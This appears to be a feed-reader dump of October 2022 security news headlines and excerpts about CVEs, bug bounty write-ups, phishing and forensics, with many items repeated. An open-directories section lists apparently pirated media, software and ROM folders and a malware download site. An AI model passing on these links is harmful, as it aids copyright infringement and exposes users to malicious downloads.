    http://library.metergroup.com/ - Irrigation & Water meters manuals, pamphlets, papers, etc. https://www.bon.texas.gov/pdfs/ - Texas Board of Nursing documents https://floridasoccupationaltherapy.gov/meetings/ - Florida Dept. of Health meeting documents https://warrickcounty.gov/Election/ - Warrick County, Indiana Election Documents https://documents.cabq.gov/ - Documents from the city of Albuquerque https://www.fsis.usda.gov/shared - Documents from the USDA Food Safety & Inspection Service https://www2.census.gov/ - Documents & Software from the U.S. Census http://www.emporia-kansas.gov/files/ - Documents from Emporia, KS https://satcomm911.com/PDFS/ - (political) Ton of documents, pamphlets, propaganda https://irctrax.net/ - (political) eBooks, documents https://www.cchfreedom.o…
  • Open

    SiteCheck Malware Trends Report – Q3 2022
    Our free SiteCheck remote website scanner provides immediate insights about malware infections, blocklisting, website anomalies, and errors for millions of webmasters every month. Best of all, conducting a remote website scan is one of the easiest ways to identify security issues. While remote scanners may not provide as comprehensive of a scan as server side scanners, they allow users to instantly identify malicious code and detect security issues on their website without installing any software or applications. Continue reading SiteCheck Malware Trends Report – Q3 2022 at Sucuri Blog.
  • Open

    La seguridad no está en tu huella dactilar.
    Cómo me salté una seguridad biométrica usando el Flipper Zero Continue reading on Medium »
  • Open

    La seguridad no está en tu huella dactilar.
    Cómo me salté una seguridad biométrica usando el Flipper Zero Continue reading on Medium »
  • Open

    SecWiki News 2022-10-12 Review
    AWS S3 Bucket子域接管实现可信钓鱼服务攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-12 Review
    AWS S3 Bucket子域接管实现可信钓鱼服务攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    $6000 with Microsoft Hall of Fame | Microsoft Firewall Bypass | CRLF to XSS | Microsoft Bug Bounty
    No content preview
    Critical IDOR Vulnerability on Medium?
    No content preview
  • Open

    $6000 with Microsoft Hall of Fame | Microsoft Firewall Bypass | CRLF to XSS | Microsoft Bug Bounty
    No content preview
    Critical IDOR Vulnerability on Medium?
    No content preview
  • Open

    $6000 with Microsoft Hall of Fame | Microsoft Firewall Bypass | CRLF to XSS | Microsoft Bug Bounty
    No content preview
    Critical IDOR Vulnerability on Medium?
    No content preview
  • Open

    CVE-2022-2992 – Remote Command Execution in Gitlab via GitHub Import
    Article URL: https://github.com/CsEnox/CVE-2022-2992 Comments URL: https://news.ycombinator.com/item?id=33178487 Points: 1 # Comments: 0
    Vuln in Vm2 Sandbox Module Enables Remote Code Execution (CVE-2022-36067)
    Article URL: https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067 Comments URL: https://news.ycombinator.com/item?id=33176479 Points: 1 # Comments: 0
  • Open

    Subdomain Enumeration Tool Face-off 2022
    submitted by /u/the-techromancer [link] [comments]
    A deep dive into CVE-2021–42847 - arbitrary file write and XXE in ManageEngine ADAudit Plus before 7006
    submitted by /u/kalibabka [link] [comments]
    Cerberus Stress Testing Tool
    submitted by /u/fficarola [link] [comments]
    Kubernetes CRD validation with CEL and kubebuilder marker comments
    submitted by /u/Rewanth_Tammana [link] [comments]
    Userland Execution of Binaries Directly from Python
    submitted by /u/anvilventures [link] [comments]
    postMessage Braindump - a brief postMessage testing methodology
    submitted by /u/Gallus [link] [comments]
  • Open

    Janus
    submitted by /u/noncriticalthinker [link] [comments]
    Analysing LastPass, Part 1 - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    Pivoting Over TTLS-PAP WPA Enterprise Networks
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Recon ITR vs Digital Evidence Collector
    Deciding between the two, but Cellebrite hasn't gotten back to me yet. What's the difference? Which do you like? Is there a price difference and is it worth it? submitted by /u/CrazyKitty2016 [link] [comments]
    Add sticky post for career advice?
    I’m always happy to point new examiners in the right direction but it seems like there’s been a lot of new posts regarding education / career advice. Could we make this a sticky on our Reddit page? Some of these answers can easily be researched at this point. submitted by /u/hotsausce01 [link] [comments]
    What are the most useful sources to learn from?
    I'm not sure if this post is against the rules. If it is feel free to remove it. I apologize. I'm fairly new to the computer forensics. I've only watched some videos and read some articles and started reading Computer Forensics InfoSec Pro Guide. I would really appreciate if you guys could recommend me some interesting material for me to watch or read. It could be book, articles, videos, ect. submitted by /u/Dependent_Option_487 [link] [comments]
  • Open

    How to Hack Browser Extension
    🔍 Introduction Browser Extension은 웹 브라우저를 커스터마이징하고 더 확장하여 사용할 수 있도록 제공되는 기능입니다. Chrome, Safari, Firefox, Edge 등 메이저 브라우저에선 모두 지원하고 있으며 Chrome을 기반으로한 브라우저(Brave, Whale 등) 또한 동일하게 Extension을 지원합니다. 이 문서는 이러한 Browser Extension에 대해 테스팅하고 보안적인 문제를 찾는 방법에 대해 정리합니다. Structure Chrome/Firefox Extension Chrome과 Firefox는 기본적으로 동일한 Extension 구조를 가집니다. 그래서 상호 호환 가능한 Extension들이 존재합니다. 다만 점점 버전이 올라감에 따라 현재는 약간 상이한 처리 구조를 가져서 호환되지 않는 경우가 많습니다. Safari App Extension Safari app extension은 Chrome, Firefox에서 사용하는 Web Extension과 다르게 Swift 코드로 빌드되는 어플리케이션입니다. 실제 내부 구성은 많이 다르지만 결과적으로 동일하게 DOM 내부에서 일부 Javascript와 HTML로 컨트롤하기 때문에 아래 테스팅 방법쪽에선 동일하게 확인해보실 수 있습니다. Safari Web Extension Safari Web Extension은 Chrome/Firefox에서 사용하는 Web Extension 과 동일한 형태의 Extension입니다. App Extension과 Web Extension을 구별하는 방법은 설치 방법에 있습니다. App Extension: AppStore를 통해서만 설치 Web Extension: Chrome과 동일하게 파일 기반 설치 API Documents Chrome: https://developer.chrome.com/docs/extensions/reference/ Firefox: https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions Safari App Extension: https://developer.apple.com/documentation/safariservices/safari_app_extensions Web Extension: https://developer.apple.com/documentation/safariservices/safari_web_extensions 🗡 Hack Mechanism 각 브라우저마다 내부적인 동작 방식은 다르지만, 결과적으로 수행하는 범위는 비슷하기 때문에 유사한 형태로 모든 브라우저 익스텐션을 테스트하고 보안적인 문제를 찾을 수 있습니다. Code audit 브라우저 익스텐션은 ZIP 파일이 때문에 다운로드 후 압축을 풀어 소스코드와 리소스...
  • Open

    分析JEP 290机制的Java实现
    JEP290在Java的实现原理
    2022产业观察 | 勒索软件锋利的“矛”:漏洞武器化
    我们发现,勒索即服务(RaaS)愈加成熟,旧的恶意软件变体回归,新的变体不断发展,漏洞愈发武器化,勒索生态逐渐工业化。
    FreeBuf早报 | 八种让人意想不到的数据泄露方式;VMware某漏洞一年仍未修补
    一个名为 Polonium的APT组织所使用新的自定义后门和工具,对以色列进行间谍活动。
    SharkTeam:Move合约开发与合约安全
    近期,围绕 Aptos 和 Sui,新兴的高性能 L1链 以及这些新链背后的 Move 智能合约编程语言引起了很多关注,社区也非常活跃,很多开发者和项目已经开始积极转向 Move。
    再谈Spring内存马之Interceptor(内存马系列篇十)
    今天继续学习Spring框架中的内存马,这里主要是使用的是Interceptor技术来构造内存马的。
    近一年时间过去了,VMware的这一漏洞仍悬而未决
    VMware于10月11日通知客户,vCenter Server 8.0仍在等待补丁来解决去年 11 月披露的高严重性特权提升漏洞。
    键盘残余热量可能泄露密码,20秒内拍下键盘热像图,密码泄露86%
    在20秒内拍摄热像图时,密码的还原率为86%;30秒内拍摄,密码的还原率为76%;60秒内拍摄,密码还原率为62%。
    十大 CICD 安全风险(三)
    在上一篇文章,我们了解了依赖链滥用和基于流水线的访问控制不足这两大安全风险,并给出缓解风险的安全建议。本篇文章将着重介绍 PPE 风险,并提供缓解相关风险的安全建议与实践。Poisoned Pipeline Execution (PPE) 风险指的是攻击者能够访问源代码控制系统,但无法访问构建环境,通过将恶意代码/命令注入构建流水线配置来操纵构建过程,本质上是“中毒的”流水线和运行恶意代码作为构建
  • Open

    Pwning ManageEngine — From Endpoint to Exploit
    A deep dive into CVE-2021–42847 Continue reading on Medium »
  • Open

    Broken Access Control leads to full team takeover and privilege escalation
    Hello all, Continue reading on Medium »
    Critical IDOR Vulnerability on Medium?
    Hello Guys, Continue reading on InfoSec Write-ups »
    IP Address takes you to the friend’s machine
    Understanding IP Address completly in one article Continue reading on Medium »
    CVE-2022–41040 Microsoft Exchange vulnerable to server-side request forgery
    Overview: Continue reading on Medium »
    HOW A SLOW INTERNET, GOT ME 50$
    Hellooo there to all my fellow hackers and readers, as promised i’m back with another writeup, and this would be too much interesting ! Continue reading on Medium »
  • Open

    We Need Cybersecurity Mentors
    I received a job description from a recruiter recently, along with the request that if I knew anyone who fit the bill and was interested, could I please forward the job description to them. The recruiter was looking for someone at an entry-level, with 1 - 3 yrs of experience, and the listed salary was for a low six-figure salary. However, the list of Essential Skills were (copy-paste, with a few modifications): - Practical mobile phone forensic analyst skills on hardware and software. - Ability to run network and sandbox analysis on Windows, Linux, Mac, Android, iOS, and other platforms. - Ability to use compliers[sic] and other software analytical tools for different platforms. - Strong in tools such as and other analysis tools. - Strong TCP/UDP/IP networking and protocol …
  • Open

    Am I the only one struggling with authentcation.
    I'm having a hard time with authentication when providing a penetration test. Every tool I use cannot bypass the login form the easy way, with most of the tools I use it seems the scan is unsuccessful and not internal because of the authentication. How do you guys do it, for example with gobuster, nuclei or kiterunner? Is there any way to login successfully and do the scan? There are only few tools like sqlmap where you can dump the whole request from burp and just select which parameter you want to test. submitted by /u/tryingtoworkatm [link] [comments]
    When to publicly disclose a vulnerability?
    Hi AskNetsec, I identified and reported a vulnerability in a website to the people who knew the website managers. They were all very professional and appreciative of the fact that I responsibly disclosed the vulnerability. Its almost going to be 2 months since I first reported them the issue and it has still not been fixed. I am not sure if 90 day full disclosure would be applicable. Just wanted to know your thoughts 💭 Thanks 0 submitted by /u/zer0byt3 [link] [comments]
  • Open

    CVE-2022-24112 Apache APISIX 远程代码执行漏洞
    作者:李安@星阑科技PotalLab 原文链接:https://mp.weixin.qq.com/s/bbfFFczkycYCpRK0b7HeHg 漏洞描述 攻击者可以向batch-requests插件发送请求来绕过管理API的IP限制。Apache APISIX的默认配置(带有默认的API密钥)容易受到远程代码执行的攻击。当管理密钥更改或管理API端口更改为与数据面板不同的端口时,影响较小...
  • Open

    CVE-2022-24112 Apache APISIX 远程代码执行漏洞
    作者:李安@星阑科技PotalLab 原文链接:https://mp.weixin.qq.com/s/bbfFFczkycYCpRK0b7HeHg 漏洞描述 攻击者可以向batch-requests插件发送请求来绕过管理API的IP限制。Apache APISIX的默认配置(带有默认的API密钥)容易受到远程代码执行的攻击。当管理密钥更改或管理API端口更改为与数据面板不同的端口时,影响较小...

  • Open

    200,000 subscribers!
    Well done r/opendirectories submitted by /u/MyClothesWereInThere [link] [comments]
    [GDRIVE] [NSFW] Movies, TV Shows, Software, Games
    https://drive.google.com/drive/folders/1Fa0E3128_Fq0UTCtHmctLFYdK7BNsH0O - Movies, Games, Software, Emulators, Roms https://drive.google.com/drive/folders/0B1j88lrqI04bUzQ5MUlpanhDMlk?resourcekey=0-OqE5HBgH60o5IKFQgJje7w - XMAS Movies https://drive.google.com/drive/folders/1Jh4e2H_mHs4j0jKjtke0ELeBey-MF2Hd - Movies https://drive.google.com/drive/folders/0BzL6M5WpOxAdUW1ON2RwWS1YZk0 - Movies https://drive.google.com/drive/folders/1Ilc5VJiA_p38Ngdeq2Ec9HFQlhaMlBSf - Massive shared folder...some legit movies, shows, and software but also a bunch of empty folders. https://drive.google.com/drive/folders/0Bx5ZmUC6oIw6eEViQTVUVVRBRFU - Shoutout to /r/TwinPeaks, fan fiction content entries https://drive.google.com/drive/folders/0B4gMc2uxf1mxNzVVWlpjLXFOeFk - Atari ROMs https://drive.google.…
    Movies, TV Shows, Music, Audiobooks, Ebooks
    http://212.66.58.15:88/ - TV Shows, Movies http://158.69.224.17/serie/ - TV Shows https://zfelleg.useribm.hu/videos/ - TV Shows, Movies http://158.69.224.17:88/movie/ - Movies http://tokopsa.com:100/MUSIC/ - Music http://plaza.ufl.edu/dunna/ - Music (Justin Timberlake's album FutureSex [2006]) http://plaza.ufl.edu/einalem/ - Music, Pictures of concepts for devices http://penguinradio.dominican.edu/ - Music, Sound FX, School sports commentary http://www.geo.mtu.edu/volcanoes/boris/ - Music & Volcano stuff https://spacegrant.colorado.edu/COSGC_Files/ - Music, educational powerpoints, NASA docs, random documents (From a Thread/Screw Drill & Tap sizes guide to how a "clean room" works) http://www.salixa.com/trh/ebooks - Ebooks (music and films available via web interface in parent directory) http://www.downloads.imune.net/medicalbooks/ - Medical pamphlets & ebooks https://zfelleg.useribm.hu/unsorted/ - Audiobooks/Ebooks https://www.uvm.edu/~gpetrucc/courses/ - Chemistry ebooks, papers, and syllabus submitted by /u/JasonSec [link] [comments]
    Huge collection of Windows software and other Windows stuff.
    https://dl.malwarewatch.org submitted by /u/ilikemacsalot [link] [comments]
    Medical, why not...
    Before-After... submitted by /u/xanderTgreat [link] [comments]
    Birds, Fish Ect...
    All images of sea creatures... Think octopi are fu@ked up floppy fish... Link... submitted by /u/xanderTgreat [link] [comments]
    Google CSE to find stuff
    Slack / Discord / Zoom invite search: https://cse.google.com/cse?cx=8e26eca532ec2cba3 Instructables / Scribd / Academia https://cse.google.com/cse?cx=4ea1b339b2e989c6d Search by filetype https://cse.google.com/cse?cx=013991603413798772546:mu-oio3a980#gsc.tab=0 submitted by /u/shawnpetry [link] [comments]
  • Open

    On Bypassing eBPF Security Monitoring
    submitted by /u/nibblesec [link] [comments]
    The Fresh Phish Market: Behind the Scenes of the Caffeine Phishing-as-a-Service Platform
    submitted by /u/CyberMasterV [link] [comments]
    Uncovering Siemens SIMATIC S7-1200/1500 Hardcoded Cryptographic Keys in PLCs
    submitted by /u/derp6996 [link] [comments]
  • Open

    Remote collection off network..
    Anyone try off network remote collection for Magnet Axiom Cyber? Magnet shows how to do it using AWS but my shop doesn't like the added cost of the instance and data transfer, etc. Couldn't you just create a public facing virtual machine, install Axiom on that and use it instead? submitted by /u/Inevitable_Logging [link] [comments]
    Do I need to keep old Cellebrite Inspector and Blacklight versions for backward compatibility?
    I inherited a machine with Blacklight 2020 R1, Blacklight 10.2, and Cellebrite Inspector 10.6 on it. Would 10.6 be able to open cases created from the older versions? Or do I need to keep all of them? submitted by /u/vacathrowaway789 [link] [comments]
  • Open

    OHSINT CHALLENGE ON TRYHACKME
    Penjelasan Serta Pemahaman OhSINT Challenge Continue reading on Medium »
    Network Footprinting With Maltego
    How to Use Maltego Transforms to Map Network Infrastructure: An In-Depth Guide Continue reading on The Sleuth Sheet »
  • Open

    How do you install an .msi remotely without giving away admin creds?
    On demand task so not looking for GPO, RMM, SCCM, MDM, etc. solutions. Ideally using psexec or PowerShell, but open to any ideas. It´s to apply to many machines. For example if there is an incident and you need to push an MSI out immediately without all the restart hassle or paying for a solution, I would have thought there´d be a secure way. Don´t mind scripting for repetition across domain. Thanks in advanced! submitted by /u/syswww [link] [comments]
    Seniors wants to get rid of soc, to save money!
    This is a very silly question but I want some input from people who work in security. We have external soc as a service (we are a fintech) I’m the only internal security person on the team all others are developers, platform engineers and etc. Boss told me we don’t need a soc it’s too much money all other engineers can do what the soc does. (All other engineers do not have any security training) we will pay them extra to come on call and resolve the alerts. I have tried to convince the seniors this is a very bad idea but they are thinking we are wasting too much money on the soc analysts. What are your thoughts on this? Should I let it be or try to convince them to keep the soc. Personally it will also increase lot of work for me since other engineers have no idea of security concepts from my experience. Thanks. submitted by /u/Hinata778 [link] [comments]
    How is Open Mobile API (OMAPI) different from Android Keystore API+Android StrongBox?
    Hi, They both are used to store secure keys on the Secure Element (SE). I heard that Android Keystore API is used to access SE basic functionality (i.e., to use it only as a container to store keys): Keystore talks to -> StrongBox, which talks to -> SE. However, to access SE's advanced functionality one need to use Open Mobile API (OMAPI), which talks to SE. Is the above-said correct or do I misunderstand something? submitted by /u/LSDwarf [link] [comments]
    Why is 2001:0db:8:0:0:0:0:1428:57:ab a valid IPv6 address?
    I am doing some IPv6 study and a question came up, to which the answer was that 2001:0db:8:0:0:0:0:1428:57:ab is a valid IPv6 address. I assume there is some simple thing I am overlooking but I count ten hextets there so am confused. Thanks submitted by /u/WhichKey1 [link] [comments]
  • Open

    Autofill/Autosave password on login
    Yelp disclosed a bug submitted by zero_990: https://hackerone.com/reports/1720621
  • Open

    SecWiki News 2022-10-11 Review
    电力网络安全分区(4+1+1区) by ourren 使用 JARM 轻松识别 Internet 上的恶意服务器 by ourren SecWiki周刊(第449期) by ourren 漏洞管理过程中的定量计算方法 by ourren Code Analysis With Joern by lightless 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-11 Review
    电力网络安全分区(4+1+1区) by ourren 使用 JARM 轻松识别 Internet 上的恶意服务器 by ourren SecWiki周刊(第449期) by ourren 漏洞管理过程中的定量计算方法 by ourren Code Analysis With Joern by lightless 更多最新文章,请访问SecWiki
  • Open

    grep.app — Pesquisa strings no GitHub
    O grep.app permite que você realize uma pesquisa ampla de strings em diversos repositórios do GitHub, é uma plataforma adicional e que… Continue reading on 100security »
    unfurl — Extrai e Visualiza dados de URLs
    Utilizando o Unfurl você vai conseguir extrair dados importantes de uma URL, mecanismos de pesquisa, aplicativos de bate-papo, sites de… Continue reading on 100security »
    GooFuzz — The Power of Google Dorks
    GooFuzz ​​é um script escrito em Bash Scripting que usa técnicas avançadas de pesquisa do Google para obter informações confidenciais em… Continue reading on 100security »
    What does red teaming mean in hacking or pen testing?
    The aim of pen-testing is to locate as many possible security threats and flaws as possible. On the other hand, the purpose of red teaming… Continue reading on Medium »
    unfurl — Extrai e Visualiza dados de URLs
    Utilizando o Unfurl você vai conseguir extrair dados importantes de uma URL, mecanismos de pesquisa, aplicativos de bate-papo, sites de… Continue reading on Medium »
    Nüfuzetmə testlərində fayl transfer metodları
    Nüfuzetmə testləri, CTF-lər və ya sertifikasiya imtahanları zamanı uzaqdan kod icrası(rce) əldə etdikdən sonra imtiyazların artırılması… Continue reading on Medium »
  • Open

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene—Part 2
    In the first Back to Basics blog we discussed cyber hygiene and some fundamental security practices one can take to quickly assess their current cybersecurity posture and identify, prioritize, and mitigate visibility gaps. This post focuses on account management measures and how proactive identification and regulation can drastically elevate your security posture. Routine cyber hygiene... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene—Part 2 appeared first on TrustedSec.
  • Open

    Canary保护机制及绕过
    本文是Canary保护机制及绕过一些学习心得,分享一下,以便大家学习。
    FreeBuf早报 | 奇虎和大疆被美方列入黑名单;英国建立“国防网络学院”
    五角大楼将奇虎 360、深圳大疆、北京知道创宇和中科曙光等 13 家中国公司列入黑名单。
    《信息安全技术 智能手机预装应用程序基本安全要求(征求意见稿)》发布
    《安全要求》给出了智能手机预装应用程序的基本安全要求,适用于智能手机生产企业的生产活动,也可为相关监管、第三方评估工作提供参考。
    十大 CICD 安全风险(二)
    依赖链滥用风险是指攻击者滥用与软件开发工作站和构建环境如何获取代码依赖项相关的缺陷,导致恶意程序包在拉取时无意中被提取并在本地执行。
    定制CIS 2022冰阔落,就送周边大礼包
    快来写上你的定制化标语,更有FreeBuf周边好礼相送~
    美国多个机场因网络攻击发生故障,和俄罗斯有关?
    亲俄黑客组织 “KillNet ”声称对美国几个主要机场的网站进行了分布式拒绝服务(DDoS)攻击。
  • Open

    Find xss using automated tools with real target.
    Hello hackers! Today I will show you some useful tools used to scan for XSS vulnerabilites in web applications. Continue reading on Medium »
    60K+ User Credentials, ₹ 1million+ Manipulation due to..
    Hey! Yo! Namaste! 😁 Its me Shivam Gupta [Rawnge] an Aspiring Indian Cybersecurity Officer. Continue reading on Medium »
    Announcing the XSPO bug bounty program
    Today we are announcing the launch of the Xfinite Staking Program Offering (XSPO) bug bounty program for anyone and everyone interested Continue reading on Medium »
    OSCP Cheat Sheet
    OSCP Cheat Sheet Continue reading on Medium »
    Help us make SO-COL better (and get rewarded!)
    Here we are at our final round of testing, open to everyone in the public. Continue reading on Medium »
    $10,000 Prize Pool in SO-COL’s Bug Bounty
    SO-COL Community Management Platform launch is round the corner and we have completed two rounds of early user testing. Alongside our user… Continue reading on Medium »
    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    What Have Recent Ransomware Attacks Taught Us?
    Recent ransomware attacks have brought to the attention of organisations that there is an increasing need to improve their systems and… Continue reading on Medium »
    IDOR + Controle de acesso quebrado.
    OBS: Nenhum dado foi gravado, vazado ou alterado, o intuito é educacional para a comunidade e Profissionais da área de Segurança da… Continue reading on Medium »
    Network Footprinting With Maltego
    How to Use Maltego Transforms to Map Network Infrastructure: An In-Depth Guide Continue reading on The Sleuth Sheet »
  • Open

    HTML 附件成为恶意邮件的常用手段
    作者:Rodel Mendrez 译者:知道创宇404实验室翻译组 原文链接:https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-file-attachments-still-a-threat/ 介绍 在过去的一个月里,Trustwave SpiderLabs观察到HTML(超文本标记语言)文件已成为恶意邮...
    MiraclePtr UAF 漏洞利用缓解技术介绍
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw 2022年9月13日,Google安全团队在其安全博客中发布了一篇关于MiraclePtr的文章,介绍了Google Chrome安全团队在缓解UAF漏洞利用上的进展。由于MiraclePtr并不是单指某一种智能指针技术,而是包含了Google安全团...
  • Open

    HTML 附件成为恶意邮件的常用手段
    作者:Rodel Mendrez 译者:知道创宇404实验室翻译组 原文链接:https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-file-attachments-still-a-threat/ 介绍 在过去的一个月里,Trustwave SpiderLabs观察到HTML(超文本标记语言)文件已成为恶意邮...
    MiraclePtr UAF 漏洞利用缓解技术介绍
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw 2022年9月13日,Google安全团队在其安全博客中发布了一篇关于MiraclePtr的文章,介绍了Google Chrome安全团队在缓解UAF漏洞利用上的进展。由于MiraclePtr并不是单指某一种智能指针技术,而是包含了Google安全团...
  • Open

    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    Harley Malware: New Attack on Android Devices
    No content preview
  • Open

    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    Harley Malware: New Attack on Android Devices
    No content preview
  • Open

    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    Harley Malware: New Attack on Android Devices
    No content preview
  • Open

    Hello World under the microscope
    (This article, written by Adam Sawicki, Mateusz Jurczyk and Gynvael Coldwind, was originally published in Polish in the Programista magazine in February 2022; Polish version: PDF, printed) Hello World under the microscope The first step on the classic education path of future programmers is creating a program that prints – most often in the terminal – “Hello, World!”. The program itself is by definition trivial but what happens after it is launched is not – not entirely at least. In this article, we will trace the execution path of the "Hello World" micro-program written in Python and run on Windows, starting from a single call to the high-level print function, through the subsequent levels of abstraction of the interpreter, operating system and graphics dri…

  • Open

    ✪ All about JWT attacks (tools included) !!!
    JWT is a token system that was originally created to make it possible to verify authorization. Although this may be used for… Continue reading on Medium »
    [Hacking Banks] Broken Access Control Vulnerability in Banking application [PART I]
    This is the part I of the story about finding a critical Vulnerability in a banking mobile app that allows attackers to obtain full user… Continue reading on Medium »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    GeHealthcare, is a company that many might not have heard of. Continue reading on Medium »
    Finding P1 Vulnerabilities: A Step by Step Guide
    Disclaimer: This article is for informational purposes only. Do not attempt to maliciously use information in this article to harm or… Continue reading on Medium »
    Exceptional Tool? Nginxpwner to Test and Run for Nginx Security and Bug Bounty
    🙏, Will see How to Install, Test and Run Nginxpwner on Kali Linux. Continue reading on Medium »
    Bug Bounty — The Future of Security
    Bug Bounty Continue reading on Medium »
    Front-Run a Smart Contract
    Blockchain data are theoretically immutable. It is offered as an inherent feature to safeguard data integrity from attackers. Continue reading on Bug Zero »
    Different Types of Hackers to be Aware
    A Definitive Guide Continue reading on Bug Zero »
  • Open

    New macOS vulnerability lets malicious applications bypass security checks
    Article URL: https://www.scmagazine.com/analysis/application-security/new-macos-vulnerability-lets-malicious-applications-bypass-security-checks Comments URL: https://news.ycombinator.com/item?id=33157411 Points: 4 # Comments: 0
    Zimbra remote code execution vulnerability actively exploited in the wild
    Article URL: https://portswigger.net/daily-swig/zimbra-remote-code-execution-vulnerability-actively-exploited-in-the-wild Comments URL: https://news.ycombinator.com/item?id=33155521 Points: 1 # Comments: 0
  • Open

    Gib mir dein Nutzernamen. Ich sage Dir wer du bist!
    Tools für die online Sozialmedia Recherche in Deutschland (Teil 1) Continue reading on Medium »
    You’re better off without a phone or electronic gadget.
    Have you ever wondered, "How much information your phone or PC knows about you?” Continue reading on Medium »
    (Aircraft Osint) How i tracked a aircraft with just a picture of that.
    What is the correct location and information of this aircraft?? Continue reading on Medium »
    October Mentoring Fest — Visualisasi dan Analisis Data untuk Investigasi Kejahatan Siber
    Speaker: Dedy Hariyadi Continue reading on Medium »
  • Open

    Stored XSS in the ticketing system
    TikTok disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1694037 - Bounty: $1000
    Deny of service via malicious Content-Type
    Fastify disclosed a bug submitted by bitk: https://hackerone.com/reports/1715536
    CORS Misconfiguration on trust.yelp.com
    Yelp disclosed a bug submitted by ajayjachak: https://hackerone.com/reports/1716286
  • Open

    Post Compilation
    For this post, I'll throw out a bunch of little snippets, or "post-lets", covering a variety of DFIR topics rather than one big post that covers one topic. What's Old Is New Again During Feb, 2016, Mari published a fascinating blog post regarding the VBAWarnings value. That was a bit more than 6 1/2 yrs ago, which in "Internet time" is several lifetimes.  Just this past September, Avast shared a write-up of the Roshtyak component of Raspberry Robin, where they described some of the techniques used by this malware, including checking the VBAWarnings value as a means of "detecting" virtual or testing environments. Getting PCAPs When I've been asked on-site (or remotely), it's most often been after an incident has happened. However, that doesn't mean that I shouldn't have a means available fo…
  • Open

    GooFuzz — The Power of Google Dorks
    GooFuzz ​​é um script escrito em Bash Scripting que usa técnicas avançadas de pesquisa do Google para obter informações confidenciais em… Continue reading on Medium »
    TryHackMe Pentest Room: Attacktive Directory
    Windows Active Directory runs more than 90% of the businesses around the globe. AD is notorious for shipping with unpatched… Continue reading on Medium »
    Agile Security Operations
    Engineering for agility in cyber defense, detection, and response Continue reading on Medium »
  • Open

    Any decent free tool to restore image to media
    Does anyone know of freeware that supports restoring common forensic images formats onto a media such as a hard drive or flash drive? Want to avoid linux atm. submitted by /u/MDCDF [link] [comments]
  • Open

    Cool way to detect notty malicious ssh sessions
    https://twitter.com/gabriele_pippi/status/1579480547499573248?t=dAWsJzRS1-2tYdE7TJQoOQ&s=19 submitted by /u/jimiilfurbo [link] [comments]
    Evil Twin Enterprise WiFi Network using Hostapd-Mana
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Is anyone using the new INTEL ARC GPU's for cracking hashes?
    The new Intel Arcs have a very competitive price point with Nvidia. Generally I'm a believer in you get what you pay for. But Nvidia is gouging, straight up. So, If you've ben using ARCS for cracking what are you're thoughts? submitted by /u/Troglodyte_Techie [link] [comments]
    Is it good practice to overwrite before deleting Reddit posts? Any programs to automate this for privacy sake?
    Has this been defeated by these illegal snooping archives? These creepy archive sites can archive doxx information for stalkers to find. submitted by /u/kingofallnorway [link] [comments]
    Best pentesting vendor - Cobalt vs Getastra
    I'm looking for a pentesting vendor for a web platform. This is for SOC 2 & ISO27001 compliance. Our choices so far have come down to: Cobalt Getastra Beaglesecurity Cobalt by far seems to be the market leader, but when we go through the featuresets of its competitors (at least going off their websites), they pretty much all offer the same things we need. Given the massive price difference (cobalt is magnitudes more expensive), are there compelling reasons people seem to overwhelmingly favour Cobalt? Does it offer value-add that justifies its steep cost in comparison to other options? submitted by /u/Lostwhispers05 [link] [comments]
    If my application's APIs uses SSL as a baseline, as well as auth tokens for most requests, how secure can it be considered.
    Looking at service providers like Cobalt and Getastra, one of the services they offer is API security testing. What makes an API secure or insecure? Maybe it was naieve, but I thought SSL usage covered us on the security part. What do pentesters test for to gauge API security outside of SSL usage? submitted by /u/Lostwhispers05 [link] [comments]
  • Open

    Persistent PHP payloads in PNGs: How to inject PHP code in an image and keep it there!
    submitted by /u/Gallus [link] [comments]
    The Google plasma globe affair of 2012
    submitted by /u/nf-- [link] [comments]
    GitLab: RCE via github import
    submitted by /u/jeandrew [link] [comments]
    A simple shell script (almost) POSIX for mail security checks
    submitted by /u/ljulolsen [link] [comments]
  • Open

    SecWiki News 2022-10-10 Review
    我是如何测试Cache相关的漏洞的 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-10 Review
    我是如何测试Cache相关的漏洞的 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    Accidental Account takeover
    No content preview
    ‍Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much…
    No content preview
  • Open

    Accidental Account takeover
    No content preview
    ‍Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much…
    No content preview
  • Open

    Accidental Account takeover
    No content preview
    ‍Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much…
    No content preview
  • Open

    Freedom, Love, and Fun: The Ingredients That Go into X
    Time to talk about X from director Ti West. Spoilers littered throughout. Continue reading on Medium »
  • Open

    FreeBuf早报 | 伊朗抗议者劫持国有电视台直播;日本IPA发布2022《信息安全白皮书》
    在过去两年中,超过九成(91%)的网络安全专家在工作中遇到过心理健康挑战。
    宜家智能照明系统发现漏洞,可能导致灯泡闪烁恢复出厂设置
    研究人员在宜家的智能照明系统中发现了两个漏洞,允许攻击者控制该系统并使灯泡快速闪烁,还可能导致恢复出厂设置。
